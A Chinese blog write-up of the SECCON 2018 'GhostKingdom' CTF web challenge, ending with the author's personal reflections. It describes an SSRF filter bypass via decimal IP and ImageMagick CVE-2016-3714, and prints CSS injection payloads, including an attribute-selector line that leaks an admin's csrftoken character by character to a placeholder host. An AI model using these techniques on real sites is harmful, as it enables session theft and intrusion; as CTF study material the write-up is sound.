SECCON2018ctf——web题解

题目:GhostKingdom

http://ghostkingdom.pwn.seccon.jp/FLAG/

image.png

可以看到flag存在web目录下的FLAG/。

image.png

这里注册一个普通账户登陆。

image.png

发现有3个功能页面,第一个Message to admin

image.png

这里的前端页面是通过css参数控制的

image.png

这里fuzz之后过滤了<>等字符,最终fuzz之后可以这样XSS

1
<style>span {background: url(xxx)}</style>

这个功能现在目前知道的是有一个css-xss点

第二个功能,后台会去访问你提供的页面,然后截图显示出来,这里猜测存在ssrf漏洞,但是访问127.0.0.1被过滤了image.png

image.png

利用ip转十进制绕过

image.png

第三个功能,普通用户不能进入

image.png

思路一:这里说要本地登陆才能访问,起初想通过XFF头绕过,可以不清楚访问的url是什么,思路断了

思路二:通过之前的CSS-XSS去盗管理员的cookie,然后登陆。

现在思索的是如何能拿到这个cookie,通过查看前端代码及头信息,发现cookie跟csrftoken相等,可以想到,拿到管理员的csrftoken就拿到了admin的cookie

image.png

image.png

之前googlectf中出来一道通过如下形式获得从csrftoken,这个我也曾在我博客中CSPbypass的文章中提到过。

1
input[value^="3"] { background: url('your-site/?key=3') }

具体参考:https://www.cnblogs.com/iamstudy/articles/2017_34C4_web_urlstorage_writeup.html

爆破结果如下

image.png

替换cookie登陆之后打开第三个功能

image.png

为一个上传界面,随意上传一个png文件

image.png

image.png

发现会把jpg???转换为gif?

把图片内容替换掉再转换发现会报错

image.png

结合报错信息,发现这是一个cve-2016-3714,于是直接搜poc打进去

参考:https://bbs.ichunqiu.com/article-1705-1.html

image.png

总结

知识点:

  • CSSinjection?
  • GhostScript上传漏洞

今日趣事

今天发表了属于自己的第一篇稿子,首先感谢同门学习师傅的帮衬,激起了我一定要发的冲动(稿费真香)

链接在这里:https://xz.aliyun.com/t/3096

希望以后能够有更加高质量的文章能够分享给大家,一个正在学习的萌新嘛,少不了从基础的事情做起,感概一下自己从5月份开始接触网络安全,到现在自己能够独立的做题,甚至能够写出文章,此前是真的想都不敢想的事情,起初学到真的有想过放弃,一个人在实验室看着天书一般的文章,我都不知道自己怎么挺过来的,好吧,容易做的事情谁都会做,困难的事情才是考验一个人的时候,引用某人的一句话吧:以后也要加油鸭(你也是)。

然后今天是2018年10月最后一天了,这个月发生太多太多事情了,真的是个一年以来最痛苦的一个月,希望明天的自己能够更加努力,没什么大不了的,我又不是小孩子,我不傻,知道自己想要什么,是作业不好做了,还是ctf不好打了,哪有这么多时间去考虑杂七杂八的事情,撸起袖子干就完事。

11月的比赛行程安排的更加紧凑了,有两场是比较重要的,希望在深大主场能够为校夺得荣誉,这可能是我能为母校去取得荣誉最直接的方法了。

完事!生快鸭!

-------------本文结束感谢您的阅读-------------